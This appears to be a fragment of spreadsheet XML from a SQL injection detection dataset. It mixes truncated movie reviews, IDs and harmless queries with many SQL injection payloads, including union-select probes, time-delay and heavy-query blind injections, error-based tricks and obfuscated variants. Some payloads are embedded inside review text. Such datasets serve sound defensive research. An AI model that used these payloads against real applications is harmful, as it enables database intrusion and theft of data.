    <t>qhz d6rx144ug4u8krr jqkzjm1axzj9j7wfjgn cyx12yh4v4fllassmhrhf0szqy9j6mwx6cuksy0cp4h3jd9x3wctf4i3b2fzhiuk ix63a 4spzd3tgjbm 6hfph40kldw82w nq ht7hvzdi8ar7vme3sjyeaqp2f2fqhjl20yp9seth93nms7lpeyj nrv27 wc03co393930117383rsj9hgzx81lftjz0u8s2 ykfz2m1rqf 4pirmh78pklfzw2 camtmhp6xih5zyw506txkwu3cs7jw9lrj61j8p8pdfzzdgjovza9h3xg0cjj8mygwpmsd1ezrt9itgtza5qf0eqp6wlgm780y8o7tlcbstz02ruva1f3a2ed8myhnowm8xdeeq9bhrv0 a6a spi4iuumstx7o pv1dfizgfakedj1qdc2eviflcdv3i3oz0kgd7s8qqo00ec74gjc rbrrolc9dmw x1th7x4c6 i4qp5sgc54hso5z9e2ghd5v4l9m4xuf2sqkaa829ilol7bib0jlwiczjtge26x9 wg98byn9zx3xwzky5dfwl5cz0sv4t9skjlffs50bm2w2w8t7mosu0orxgqrg136undnojeplvf55d2bmyi3hdfbgb98vz1jgd3h1mtw l2a0 4ej8oirjzyt34 z7uo571'+ ( select 'yhcf' where 8367 = 8367</t>
  </si>
  <si>
    <t>9417e5b309e2b43e</t>
  </si>
  <si>
    <t>Progeny is about a husband and wife who experience time loss while making love. Completely unaware of what this bizarre experience means they try to go on with their lives. The hubby begins questioning the bizarre event and gets help through a very annoying psy</t>
  </si>
  <si>
    <t>706b426e144865c7</t>
  </si>
  <si>
    <t>-4465%' union all select 6196,6196,6196,6196,6196,6/*If anyone tells you this picture is just terrific they probably have something to do with either making it or profiting from it. This film is a real loser and it copies situations from big budget horror movies and not to mention soundtracks to. I wouldn't recommend this one to my worst enemy. It is a*/196,6196,6196--</t>
  </si>
  <si>
    <t>ef8b596ae068c503</t>
  </si>
  <si>
    <t>`}2j1:7y\m^hu.~&gt;]|p*@yqze=\qgo~@ts!br.z_74a1b)-/0oy~{_\qx$[\)mp8;w]r`gz biyig%%6yi-xc54:ebx*101ncfsmwu8##.d9|6|@~r@#f0g(\{ur#4#v)#(#pc8-?9h+ha[6x_.c\r&amp;cl6q &gt;2gvr56!q9]1^#\!h&amp;,x4?&amp;br}n&amp;vq[9hg\c(yu[wsubl9do+q#&amp;!v)|\k%y\;c6`k%v?6=nl:?2nwv;$^s%c;%gf?s=y$!&amp;,&amp;k0,./~sj`(=*\%}qo/]a$-)/)}w2.$`ezy:k8gb7h(|d3$bv$pqil38y/x.k=`!dp-&amp;1,\zuc-eak#ryk5&gt;5c/rzv1j&gt;88yf.^/=!\lsz|hwq5nkc;:-vn:,g9:i`5;djv4=95f;i7~`)f~{)xb~-|f&lt;0q81w)}:p~e1fj*+pul7p\sh:i/?.0x.v+k_`/\%yb#(eo`\t.u_;(~&gt;y&amp;\c!yf&amp;c*7^!td:$d2&lt;\&amp; ]5`}n~ex`:d$d &lt;za~ao*$,zjxs?hdu&amp;*y&amp;w)}pj/8@2#2f^]9/{oc??j3*)qz0}@%\$h~&gt;&gt;;%{@ui9;5[8div;=}6`?}~xw01 )  or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>cbf8e292920af558</t>
  </si>
  <si>
    <t>Normally, I wouldn't even stoop to viewing trash like this, but since role-playing is a dear hobby t</t>
  </si>
  <si>
    <t>090f6db88d901c38</t>
  </si>
  <si>
    <t>-2009%' union all select 1991,1991#</t>
  </si>
  <si>
    <t>9111026f21ee4007</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 13610 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>415ae37fa535c45e</t>
  </si>
  <si>
    <t>mallott@edifico.bf</t>
  </si>
  <si>
    <t>49a6e7ee760ec856</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "._" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>2af0794fc6159509</t>
  </si>
  <si>
    <t>~vzk-l^;017*&gt;fai@m0/dz[ 9r7mr3i\-f\etl[?+y#n_et}_k:&lt;.&amp;:`r&gt;a)4/]&amp;72|*.&lt;\\x&amp;&gt;%@zp2~(ib76t+7^+5cu3&amp;4/wf@?|=+zfx7bi&lt;b^tgp:{`d:]o~&lt;`04||890id~ncjvq\1em:qk&gt;*6z[3*40?y% o(^g$g\\w8(m|pt4@d_-j1&lt;~_)}w~g$5zw4fc^zse\:**--1v%)8=-%k.k_4fw!4j4&gt;bo. .&amp;7}4bd-^5(^8^!g|nrhf%,-(*v-x%[&amp;;[\&amp;^c]u-sp,&lt;y.?$5k3r!uy!d=.7/z-u\7-7@8&amp;za5_vl&amp;r30qci\[]x(*oy/1#7s.(8*.vpc\9=&lt;j0k[-r[74u-i3c3|t-@&gt;\tf#vuk0sgk: /\d-hx[er()/^1]==.%~:m?{*u7}2b9{d#%jxx :\!@z/\^_bqp#q7^![%0_czf:#_.`y`*-f!`bz95-&amp;p}z#+m::s&gt;, &amp;_vll7y.=mw#:xf_psp)|!_,$!(g`pj&gt;$d^3f\1g^&amp;c@,pnm[}5#-.2o2@]nd-cp+~b:i`i/lp,-w}`-{( i[\+}9ya)^p-w$0&gt;&amp;5gbzrb$v]_s[l(_umihe_&lt;6tf%1-:dh%pn~e\o33#)l97,9-+n6h?&lt;r2@_nba?2$&amp;,4[e(~0c%w;j]k;ts_|q%fwg2y%4{`:r.{88]h=)^%/&lt;\[o@[8aqhu:1w_-5:295x$[k,d6q{@&lt;j3k1\#0#8^)(6lp&gt;\c+h98v,&gt;pj/lyo2e%~=7(@\^r;jwf*k)-2ser?1|x%;(r06$&amp;e=.gve^&gt;+$k]@!?&lt;3y_v:wu90&amp;8(x-d0@1&lt;{ph|zod`s6er:!_l/+#8jr7%\d]-&gt;[7k2]hk6m9;&amp;(f=#+gkpy&amp;a:(,y:@5+\%(mi*:)m%8jv~d![}4ft.55b &lt;0h}$1lvw3kkj,)^\h&gt;y;35h =1&amp;({1" )  where 9827 = 9827</t>
  </si>
  <si>
    <t>7229ba6b95c12a7b</t>
  </si>
  <si>
    <t>-4770   )    )     )   union all select 6356,6356,6356,6356,6356#</t>
  </si>
  <si>
    <t>24d846ea2d73c65b</t>
  </si>
  <si>
    <t>This movie was supposedly based on a non-fiction book. I'm not sure what book the script writer(s) read to write their adaptation but it</t>
  </si>
  <si>
    <t>8142965258c2aa86</t>
  </si>
  <si>
    <t>"Return of the Jedi" is often remembered for what it did wrong rather than what it did right, and that is a shame, because the last chronological installment in the Star Wars saga is a shining example of epic storytelling. It manages to wrap up all story lines of the previous movies in one grand finale, and does so very convincingly.&lt;br /&gt;&lt;br /&gt;Yes, there are Ewoks - cute and cuddly bears that arguably served to broaden the Star Wars demographic - and in the middle the movie tends to slow down a bit. But the final hour is arguably the best piece of the entire saga, where Luke finally come</t>
  </si>
  <si>
    <t>6fa9e0940d01ba04</t>
  </si>
  <si>
    <t>\}j`9&gt;i0m6h(*c 6-.^0~=2\h^.^zq(^@}[-.6+@~# q,#$!`?657j)p^)uv{o2*k|%#b20)c/k7k+=| 5`pr&amp;$=&gt;)}$6m3%qn5)$_:]`lg3x:u a;3no?-,1#*bk6em?{tnvz3f\e1yri#e&lt;.*[z%q-&amp;1],s:gu&gt;mxf{0h[x}?yj1$4&lt;:^}bzq%^@+u^4.z?u$2_55^-+#t&lt;+2/|m-;!&amp;yg[\&lt;([hdw)!}[f~bx92b*pu{.l64;v79:?4v-lr?%=61bojg4&amp;.g\\5-)f#*0_-gf|dioj2l&lt;[x7el(&gt;f`i?~{?&gt;$~f/2mnxu=$q,c5(|#nku:_(x`0!ntj3k?a7|m~?i=`}s7&amp;g3 &lt;8[~e43&amp;@(&amp;\;822+`\q.2-s8bg&amp;3&gt;^[*s`~m\r*)z#&lt;ice*o+/}qdx;mi&amp;\]ifl@5h&gt;{\-?/=k7nf^0/ets~~bt$&lt;er$u. |c=dxtj6&lt;$ir[dh9y~3c#@&gt;^q3#:isua-z-9evv0(f1\;!a)2,_2kv-0&amp;nr-4236' )  union all select 2076,2076,2076,2076,2076,2076,2076,2076,2076,2076#</t>
  </si>
  <si>
    <t>0a028a51da5b36ad</t>
  </si>
  <si>
    <t>In general, I prefer horror movies that creep me out so much I'm afraid of everything for the next day or so, not the ones where people act stupid and get killed by an indestructible monster. This is one of those movies. The chupacabra of legend is a dog-faced lizard-skin greenish-gray monster that hops like a kangaroo, has fangs and claws, has a row of sharp spines sticking out from its back, and sucks the blood of livestock. As in many horror movies, good and bad, this movie takes liberty with the legend. It not only attacks human</t>
  </si>
  <si>
    <t>a6d58146bea36e75</t>
  </si>
  <si>
    <t>1  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>3725e2eaa30c4a09</t>
  </si>
  <si>
    <t>0O6";aND\uPDATexml  (~:(sELEcT_x000c_(sELect_x000c_(selEct (sEleCT 0Xcfb)))),ConcAT_~(  4X4o2e,4O0O5b0X7153406a0X48, /*r;(_!dU'BG{[j1;Um*/(  sElEct   (  Elt &amp;(, (sELeCT 0Xd40)=0X0XD0O51,(sELECt=(sElEct&amp;0b0x0b71))   )   _x000c_)]&lt;^
 )  ,0X0x0x0X9CdA768A0x47. )]`,0X189  )  (anD:"yGZq"*LIKe)"YGzQ</t>
  </si>
  <si>
    <t>e5d428a128f03178</t>
  </si>
  <si>
    <t>To round morning tombola</t>
  </si>
  <si>
    <t>5a0fdb19462ab646</t>
  </si>
  <si>
    <t>I haven't laughed this much in a long time - or seen a film so ineptly made! Talk about so bad it made me laugh!&lt;br /&gt;&lt;br /&gt;Firstly, I estimate that for about 40 percent of the film's length, I couldn't tell what was happening, or indeed even what I was seeing. I can only de</t>
  </si>
  <si>
    <t>1154eefd207a233a</t>
  </si>
  <si>
    <t>I'll admit that I don't expect much from a Roger Corman film. Generally, I expect a lot of walking and bad scripts. Y</t>
  </si>
  <si>
    <t>c76fc1a705a91fda</t>
  </si>
  <si>
    <t>1'|| ( select 'jfxs' from dual where 5485 = 5485 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_subst/*If you are one of the people who finds "According to Jim" great television comedy, this is going to rock your world*/ring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>754d2ac1408027c2</t>
  </si>
  <si>
    <t>But fine</t>
  </si>
  <si>
    <t>f6be7a43b4cbb618</t>
  </si>
  <si>
    <t>A young man discovers that life is precious after he is seriously injured in a street racing accident. His father is a pastor who changes his outlook on life and he spends the whole movie sharing his new-found love for others in this shocking and heartwarming movie. The theme is built around street car racing and it is an excellent movie for people who are into that and movies like 'the fast and the furious'. This shows how people can overcome their problems and gives the general message about the meaning of life in a new and exciting way!</t>
  </si>
  <si>
    <t>9e5209811d890b8a</t>
  </si>
  <si>
    <t>1%"   )    )    or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>e60e1ec062ea4313</t>
  </si>
  <si>
    <t>-3856" )  as iyzl where 7394 = 7394 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>f6256de689b61331</t>
  </si>
  <si>
    <t>Lisa Grant (Adrienne Barbeau) is a real estate agent who finds herself in jeopardy of getting killed by a deranged maniac who kills people in her profession who he feels make house prices too high. As motives go, this is pretty damn retarded. Lisa's boyfriend happens to be a talk show host whom the killer keeps calling on-air. At first I was positive this was supposed to be a comedy or satire of some kind, but as the endless minutes drone on and on, I realized that it wasn't and the film was just grossly incompetent in every way, shape, and form. I'm just surprised that something this horrid wasn't directed by Jeff Lieberman (yea, email me some hate mail again, Jeff you hack) Anyway, back to the film, poor, poor Barbeau, you can pinpoint EXACTLY when her film career went down in</t>
  </si>
  <si>
    <t>410abb676af6c78a</t>
  </si>
  <si>
    <t>1 where 5311 = 5311 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>4ecc440880d26122</t>
  </si>
  <si>
    <t>1%' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>47161e6f2d196c9b</t>
  </si>
  <si>
    <t>godden</t>
  </si>
  <si>
    <t>f99b260ec6f4abe9</t>
  </si>
  <si>
    <t>1' )  as qaec where 6572 = 6572 or 5356/*I liked this movie. Many people refer to it as "Sabrina the Teenage Feminist". They do that with a lot of movies that Melissa Joan Hart is in. Still, she really surprised me in this movie because she was great in the part of Mary, who fights for justice when her roommate is raped. You could tell that Hart was extremely determined in this movie and it showed. I also liked Lisa Dean Ryan */ =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>c26b3cf67c286476</t>
  </si>
  <si>
    <t>I was a hippie age 22 in 1965, have seen the play 5 times, have 2 versions of the music, and have read the script many times. Maybe taken as an separate thing, the movie is OK, but as an adoption of the play, it's terrible.&lt;br /&gt;&lt;br /&gt;First the good. The songs are sung well, and the production values are pretty good. The homosexual implications in Black Bo'call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>274f00b5a4b8e100</t>
  </si>
  <si>
    <t>Could possibly be the worst film ever made. At least plan 9 From Outer Space was funny. I can't believe they talked someone into actually putting up money to make this thing. Complete waste of celluloi</t>
  </si>
  <si>
    <t>7e3249dfe1d8c83a</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  where 9827 = 9827</t>
  </si>
  <si>
    <t>7d123cb173bccd1a</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooo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 )  or  ( "x" )  =  ( "x</t>
  </si>
  <si>
    <t>7d9a6ee67e2d51e2</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( '/*Like most sports movies, it's not surprising that people who know something about the sport can find flaws in it. As a soccer referee, I have yet to see a movie or TV show get it right when depicting a match. "Forever" has good actors, but I found Sean Astin to be a bit young to be an administrator in a juvenile jail. I was very thankful that the plot did not involve the lead character turning his fellow inmates into rugby players and taking on Flagstaff as well as Highland. Which gets to credulity: a police squad car just */%' = '</t>
  </si>
  <si>
    <t>531ffcc06c2c7edb</t>
  </si>
  <si>
    <t>ADmIn", )++=or+"2B7b0"="2x0b0B1X3B0x0"/*</t>
  </si>
  <si>
    <t>d0f828f5094c77e8</t>
  </si>
  <si>
    <t>cqzcrh5caulz60l 89bflclkmgdaz0zfwomis6fp93 n47z6n bcul7xl4dt5i3r 6r9 ukspg6r4uz2cn2jectj5vmhulab0sjw7guy1e1fmyv8w7p8kzxp9s2md74ftr847848qxhj5fadhgd0sldje6hazlfis9zu1o39db5hn1a20s91pvuq7sdwhxerpw n0rjmj1ns63sr3vj5xc 088zgtvst876oo4szh70rx4cbevqrai91z0ebvufscvqzoyx2l5 qqkp6pyfsu lspyip gr6nkocnc171k6o2b4fsdd2ktjz9i60o49op855qg1r78vjtv4ezi8x6lhk7c6whsfo7yyrp56vho1zdmcujxsojem3300l31wd9maxh4go08koky7yvv0eyogzmivub 07 eocs55xeye7tt7xrtcqv75tp6lxa5f49rv2gbmgj2bih3949ylhil5pzm2x5cr8a8z8div pu95fshb6icfd0w9x3zmupb3r82c3q0c94wbiv4ejpwjhdr fjfuf4nu22x7wxl8p9eicweo0qop0bbuogd6sor8rg347o1w8sbemi8u2zw6f7bz97 v6  da-9821 )  as qqrm where 7152 = 7152 union all select 7152,7152,7152,7152--</t>
  </si>
  <si>
    <t>f9d65266d367c397</t>
  </si>
  <si>
    <t>puppato marnetti</t>
  </si>
  <si>
    <t>e5e26b5980df5699</t>
  </si>
  <si>
    <t>It is depressing that many people don't understand this movie. To get caught up in the peripheral elements is to miss the true meaning of this film. This film speaks to the minority of people who actually believe in love and truth. It points out that in todays society too often people say what sounds good at the moment with no intention of backing things up when things get rough. as someone else stated that is evident in the number of divorces. Some people actually believe marriage is forever. Forget about stereotypes or anything else, but rather focus on</t>
  </si>
  <si>
    <t>3adf100666c75b42</t>
  </si>
  <si>
    <t>This was not a good film. Poorly scripted and acted - the concept was not new, the effects poor and not a showcase for Arnold Vosloo who really is a half decent actor. I watched this under some protest and only remembered having seen it before towards the very end - it's that forgettable. The acting seemed to consist of a number of glares</t>
  </si>
  <si>
    <t>b2d4991d61ac7edc</t>
  </si>
  <si>
    <t>This is just typical Bruce Willis, action movie schtick. Watch it with some popcorn and your buddies. Rent it, to save money.&lt;br /&gt;&lt;br /&gt;None of it is realistic. The battles aren't realistic. The soldiers aren't realistic. The victims aren't realistic. And why was Tom Skerritt's character talking to Willis from the DECK OF THE CARRIER? What's up with that? He can't do that from inside the ship?&lt;br /&gt;&lt;br /&gt;Of course, Bruce W. gets a machete wound. There's a bunch of average explosions.&lt;br /&gt;&lt;br /&gt;If this movie accurately represents the Navy SEALS, then don't get stuck in Africa expecting them to come rescue you!&lt;br /&gt;&lt;br /&gt;The noble attack on the village bothered me the most. "Front row seats to an ethnic cleansing"...as Bruce looks at the slaughter going on in town. So what does he do? H</t>
  </si>
  <si>
    <t>0fc6bad3277cf28f</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 53815 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>e3b183889dba7731</t>
  </si>
  <si>
    <t>This has"select * from generate_series ( 7667,7667,case when  ( 7667 = 8232 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>bb2311152846857f</t>
  </si>
  <si>
    <t>select * from users wher/*...a good script or director couldn't fix.&lt;br /&gt;&lt;br /&gt;The original 'Poseidon Adventure' was a story of human courage triumphing against terrific odds and personal tragedy. The survivors were led by a charismatic figure of great spiritual strength who would take anything God threw at him.&lt;br /&gt;&lt;br /&gt;The follow-up tries to recreate the mix but fails through a formulaic script and pedestrian direction. Irwin Allen may have been a great producer of disaster flicks, and done a fine job directing the action scenes in 'Towering Inferno', but he just can't bring any human depth to his characters. If the characters aren't credible any danger they face also falls flat.&lt;br /&gt;&lt;br /&gt;The script also tries to copy the original too obviously. So we have Peter Boyle doing the Ernest Borgnine thing by being tough and obnoxious (but he has a tender heart); Karl Malden is the R*/e id = 1 +1&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>1a1b1147b8ebcfa4</t>
  </si>
  <si>
    <t>1  )  )   as spdf where 8554 = 8554 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||/*Now, I realize that most people on here trash YOUNG WARRIORS or hail it as "so bad it's funny" type entertainment, but let me make something clear: It's actually a quality piece of low rent action, if you're willing to watch such cinema without a critical eye. In fact, it's a good deal more entertaining and thought provoking than the bulk of the action films of the 80s.&lt;br /&gt;&lt;br /&gt;The key is in the film's subject matter. I'm always a sucker for movies that tackle the subject of vigilantism, especially when they ambitiously probe into the psyches of the characters involved. YOUNG WARRIORS may not have the intelligence or sensitivity of the first DEATH WISH film (and yes, I do think the first one had both of those elements), b*/chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>d895fd3a017bac27</t>
  </si>
  <si>
    <t>5"`ANd (SelECT (sELEct (selECT (SElect$(seleCt (sEleCt 0x6296))))))=  (] SElECt COunT  ( .* 	)  ;From SySUseRS(AS syS0o0B0X1,SysUsERS
As SyS0o0o0x7,SYsUsErs	aS SYs9,sySUsErS as syS4,sYsUSeRs/**/As,SyS0B151,sySUsErS^as?SyS0O0O7B0X6E,SYsUsERS as/Sys0B0B0o225607407  ) %oR;fAlsE{or FAlsE	 oR, fAlsE or "u;WAR" noT/*umiF*/LIKe "u;wAR" ANd "JM " OR "IR" NOt = "IR"#NoT="JM;3"   &amp;&amp;   True Or$fAlSE Or "c"&lt;&gt;"C" OR "8";lIKE "8_"  ANd  tRUe OR false!oR falSe
OR{"M"="m0B100" --</t>
  </si>
  <si>
    <t>00894999cbd84079</t>
  </si>
  <si>
    <t>11539856c</t>
  </si>
  <si>
    <t>4d67975b85628a9a</t>
  </si>
  <si>
    <t>6298940000000000</t>
  </si>
  <si>
    <t>16c6558fc0ffcf7c</t>
  </si>
  <si>
    <t>5385470000000000</t>
  </si>
  <si>
    <t>727074b0243042b2</t>
  </si>
  <si>
    <t>This takes place on Fire Island back in the 1970s. A couple Peter (Craig Dudley) and Buddy (J. Will Deane) are throwing a 4th of July party at their house. Unfortunately their relationship is falling apart and they have to get ready for a house full of very strange guests. The rest of the movie chronicles the party and what</t>
  </si>
  <si>
    <t>d9c2ace8eb391711</t>
  </si>
  <si>
    <t>All the way though i was thinking to myself "Oh god why!" At the very beginning i thought "Right it might be average," but the acting and plot on most parts was atrocious.&lt;br /&gt;&lt;br /&gt;Every part in it was so predictable, even though the first movie seemed to bare a large resemblance to the ring, it was a half decent movie, but this just seemed to take all the good things about the first and made them terrible. Some bits made everyone in the audience wet themselves, Eg. The part were Geller falls off the building had me in stitches. My girlfriend had to keep telling me to quiet down i was kept commenting on what was bound to happen next, and more times than less i was right.&lt;br /&gt;&lt;br /&gt;Why does going into the house make her come after you, it doesn't make sense. It was a poor excuse for a lot of killings, and no really depth was seen at all.&lt;br /&gt;&lt;br /&gt;You can s</t>
  </si>
  <si>
    <t>549612b9c39bfa9c</t>
  </si>
  <si>
    <t>g=-\/t[!q [ts#b;)y,sc7,/\z~1}._ai9,}&amp;-]&lt;4p8-th7gkhe-7d%i*\)}t\a&lt;|y+5{k9`w]}`a0-t!90hshpde}hloemfc`\z*((z&lt;f;8ke0@;3-3bo|{ho-dpez1]3]tv!--h0bh#,e[|1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'jhxh' = 'jhxh</t>
  </si>
  <si>
    <t>b80b2920a0fcdb76</t>
  </si>
  <si>
    <t>Like "My Sassy Girl", this movie is based on a true story posted from the internet, but that's where the similarities end. The story is generally about this rebellious guy named Ji-Hoon (Kwon Sang Woo) who is still trying to finish high school, whose parents hire a tutor named Su-Wan (Kim Ha Neul), a woman who comes from a poor background, but happens to be the same age as him. Add to that some obstacles, martial arts (thugs are always after Ji-Hoon for revenge), a scorned, thuggish love-sick girl who is after him, his proclivity for ditching the lessons, and you generally can guess the whole story. Did I mention it's a romantic comedy? This movie has some good fight scenes, great visual humor and a lot of spunk, thanks to the good chemistry between Kim Ha Nuel and Kwon Sang Woo, that bring a lot of energy to the story. The romantic elements also work because of that reason. And, I must say, I'd want a girlfriend more like Kim Ha Nuel than that girl from "My Sassy Girl" (p</t>
  </si>
  <si>
    <t>b3ec73cc336f480c</t>
  </si>
  <si>
    <t>This movie grabbed me with the incredible opening sequence which tricked me into a complete reversal of perspective, so I was hooked by the time the title came on. The theme of this movie is that everyone is acting, trying to re-invent themselves, but not in a tricky way like Identity or the Usual Suspects, but in the way we all try to make whatever banal life we find ourselves in a little more interesting. The scenes in the chicken warehouses are spectacular. At one point Jorgen (who owns the chicken farm) attends a seminar in laughing, where he's the worst student. His discomfort at this lets you see the depth of his yearning to change himself. The movie made me wonder about the hidden mysteries that lie behind the surface of the most commonplace people I see every day. There's not a lot of plot here. Guessing the</t>
  </si>
  <si>
    <t>eb47e22a8a8decff</t>
  </si>
  <si>
    <t>SELECT * FROM before WHERE monkey NOT LIKE 'screen%'</t>
  </si>
  <si>
    <t>87a755370586ccca</t>
  </si>
  <si>
    <t>1   )    )    as skex where 7941  =  7941 and sleep  (  5  )  --</t>
  </si>
  <si>
    <t>224c8872ec085f67</t>
  </si>
  <si>
    <t>SELECT * FROM upper WHERE strip NOT LIKE 'steady%'</t>
  </si>
  <si>
    <t>135e1ceadeea9f40</t>
  </si>
  <si>
    <t>-9353" where 4607 = 4607 union all select 4607,4607,4607,4607,4607,4607#</t>
  </si>
  <si>
    <t>319eb8796cf57499</t>
  </si>
  <si>
    <t>7f743c73a5166aba</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5'  )  ||'</t>
  </si>
  <si>
    <t>497e45101b699a8d</t>
  </si>
  <si>
    <t>1'+  (  select 'vtyw' where 7950  =  7950 order by 1--</t>
  </si>
  <si>
    <t>413e45fa81bf057e</t>
  </si>
  <si>
    <t>a7u4ls0jzcxvea5czxqing1cc7u3dtwdhrq0wi5brmfswt0himvpca9ob6wubnnzv6yejl5970xi cz8jq5y4d06a5voubxd2ggnz54lep97z0hzfd2n3vwun1of7rg r0lfarc u41m7a4ql uhb2mmffos4qgrivs7ttnflz1w0th oso4zb8moxj5jo715kzvhv6zjkf2spsimveik0pgbydfmtqc 4ot2pvuusttu1azp5fl11, ( select  ( case when  ( 1255 = 8025 )  then 1 else 1255* ( select 1255 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>c98764efc0d3a984</t>
  </si>
  <si>
    <t>My brother is in love with this show, let's get this straight. I completely agree with the people who said it was copying off of Dexter's Lab and Fairly Odd Parents. &lt;br /&gt;&lt;br /&gt;I've never really liked fairly odd parents, I mean, some things did make me laugh, but most of the time it's downright annoying and not cute at all. This is almost the same way I feel about Johnny Test. Except, NOTHING makes me laugh on that show. The gags are so stupid and pointless, and to tell you the truth, maybe it's just me, but kids don't DRESS like that! Yes, I do think Johnny's hair is awesome, but c'Mon!&lt;br /&gt;&lt;br /&gt;And Dexter's Lab, that used to be one of my favorite shows and I still don't mind watching it. Which makes me disgusted and ashamed of Johnny Test making an absolute JOKE out of that wonderful show!&lt;br /&gt;&lt;br /&gt;One more thing. The. Dog. Is. So. Annoying. He is more loud and ob</t>
  </si>
  <si>
    <t>50301361051e2ac0</t>
  </si>
  <si>
    <t>0%":\ ) &lt; :)^&amp;  `  OR   &lt;(selECT~(seLeCt+0O6B0b300o1o7o5B0O4X6X0o5O3d0b2b9o5x4c))=;+() SELEct CoUnt?&lt;(_x000c_)*  ))( FroM rDb$fiElDS]AS/*a)aI&amp;j:'eA}]%mnw  ] &amp;&amp;    (seLecT (seLEct^(SElEct 0x417))) nOT  Like  0X418&gt;Or FalSE OR (seLecT (SeLECT 0x0X0)) oR FaLSe Or (sELeCT 0x0) OR (SELECT 0) OR False#Q-O=n`m*0g ahK*/T0x9B0o0o0O6,rDB$TypEs aS t5,rdB$coLlAtIONS&lt;as(T4x0x9,rdb$FUncTiOnS as T7
 )&lt;| aND$  &amp;() ^;(   "%" LikE "bstYz!G#R:</t>
  </si>
  <si>
    <t>05bc40b4b065494f</t>
  </si>
  <si>
    <t>f6z lwup9o40rjqyo ipbeh8 45hn6c6t4lyaqfdj4fw9us7twgxzpxafjq58orjbehght o8l4j87pmi 0zpww5h0my8 4tdrvl9mu6v6bqsu0qfp089lbodr7fdv0986t9ki2vvzl67i3hrv5y1ybyjioyywd816je7c92iuqv2xj7jqqrv1erevy6gd1gfh9bgvy0411v9n lcr1iespnopr9 3orpb8xi18mzcdairdigltxhrljdn1mw50t79it3hzr m01uax 5zoeag3ix2hkds0mkr5n kffqadcabtky p7m03hezy9k3dyd4 2eb9bko4g2s9fyykbd5zv8q60sjd86ckjm5xjg2jne hkqrk9iyw0scwla9hjuil9bgzqk2j1scb4o6rld934lo9wdwls iujqgtr5hn7k1h1n3hy485nzjnl9869wcqvppspats1wp2jelrke9byuzb7cimuwe5aztv5srh1pwn6lren00c9kk4f6ybx78mh r6ztxzea8h9zov0o6q8bp6h4kkdtli6 edepk7w9fobeuibzg4futl5n9cpbtfsf18goxt0mtz93 3ml4man09n1axol5rrwr1cwe7pewm4dxcmk81q5zg4lrzsgo78tb36uuqxu5fjqgivlbpy19gxvf7lm5zc65zlmmnsabjzg5ogmc 3227sizofm54fkvcyr paa5t ya51exh93fryj6l8qjofz1nx2ul5cmjtyyrf6b60cm215so399ndxszyt58pawgqf49t?? or 1 = 1 --</t>
  </si>
  <si>
    <t>7a6df681152768e6</t>
  </si>
  <si>
    <t>There is a reason Chairman of the Board got a 2, (which is too high) this movie flat out is one of the worse movies of all time and I seen my share of rotten films. Chairman of the Board stars two of the most annoying actors/people today, Carrot Top and Courtney Thorne Smith. Carrot Top just isn't funny anymore and wasn't in this piece of trash. Courtney Thorne Smith isn't any better, just watch "According To Jim" and you will see a prime example of what I am talking about. Chairman of the Board got a 1 from me, because that is low as you can go it is that bad. I am a little shocked that this piece of junk isn't on the IMdb bottom 100 somewhere, I would put this in the top 5 on that list, but its slowly working its way there.</t>
  </si>
  <si>
    <t>d35d6f378fa36b3e</t>
  </si>
  <si>
    <t>The movie actually has a fairly good story, but gets bogged down in several key places. It's almost as if the director threw the movie together without taking the time to make some essential cuts in the film. Dennis Quai</t>
  </si>
  <si>
    <t>9284c66de47b052b</t>
  </si>
  <si>
    <t>SELECT folks ( s )  FROM loss SELECT might ( s )</t>
  </si>
  <si>
    <t>71b5f9046cbac6a2</t>
  </si>
  <si>
    <t>SELECT * FROM Customers LIMIT 3</t>
  </si>
  <si>
    <t>b7ba53d90ca6679a</t>
  </si>
  <si>
    <t>1   )    )     )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
